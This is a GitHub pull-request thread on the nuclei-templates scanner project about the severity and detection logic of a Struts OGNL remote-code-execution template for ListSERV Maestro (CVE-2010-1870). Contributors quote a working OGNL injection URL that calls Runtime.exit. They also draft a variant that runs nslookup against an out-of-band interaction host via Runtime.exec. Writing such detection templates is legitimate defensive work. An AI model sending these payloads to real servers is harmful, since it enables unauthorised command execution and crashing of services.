nuclei-templates
nuclei-templates copied to clipboard
projectdiscovery
updated severity
In my opinion a RCE is definitely not just an "info" finding - being able to execute code should be regarded as high.
Template / PR Information
- Fixed CVE-2020-XXX / Added CVE-2020-XXX / Updated CVE-2020-XXX
- References:
Template Validation
I've validated this template locally?
- [x] YES
- [ ] NO
Additional Details (leave it blank if not applicable)
Additional References:
- Nuclei Template Creation Guideline
- Nuclei Template Matcher Guideline
- Nuclei Template Contribution Guideline
- PD-Community Discord server
@TheConciergeDev, thank you for the PR, since the template is based on version only, and the vulnerability itself has not been confirmed, we have marked the severity as info.
Normally, we add templates with the full P.O.C so that there is no chance of false positives. However, in this case, the P.O.C is not included in the template. Thanks
Either we can try to convert the exploit into a template or we can migrate this template from the cves section to the appropriate directory.
@ehsandeep @princechaddha I found this https://www.exploit-db.com/exploits/14360
http://mydomain/MyStruts.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.den
yMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\[email protected]@getRunti
me()))=1
But I don't know the matcher
id: CVE-2010-1870
info:
name: ListSERV Maestro <= 9.0-8 RCE
author: b0yd,daffainfo
severity: high
description: Struts-based OGNL remote code execution in ListSERV Maestro before and including version 9.0-8.
reference:
- https://www.securifera.com/advisories/sec-2020-0001/
- https://packetstormsecurity.com/files/159643/listservmaestro-exec.txt
- https://www.exploit-db.com/exploits/14360
tags: rce,listserv,ognl,cves,cve2010
classification:
cvss-metrics: AV:N/AC:L/Au:N/C:N/I:P/A:N
cvss-score: 5.0
cve-id: CVE-2010-1870
cwe-id: CWE-917
requests:
- method: GET
path:
- "{{BaseURL}}/MyStruts.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\[email protected]@getRuntime()))=1"
matchers:
- type: status
status:
- 200
Maybe like this, but with this matcher there will be many false positives
@daffainfo correct that'll probably return a few false positives, and the exploit appears to be destructive (as it calls an exit of the Java runtime). Are you able to add additional matchers to test the output? You can achieve this using something like:
matchers-condition: and
matchers:
- type: word
words:
- "This is a string that can be found in the body of the request!"
part: body
- type: status
status:
- 200
Using InteractSH may be a good idea here, below is a non-destructive payload that may work.
{{BaseURL}}/MyStruts.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exec('nslookup {{INTERACTSH_URL}})')(\u0023rt\[email protected]@getRuntime()))=1
I'll try giving this a shot, but I'll need to find vulnerable hosts first.
WIP under #3111 but currently blocked due to lack of vulnerable hosts. Once one is found and I can replicate, I can get the rest done.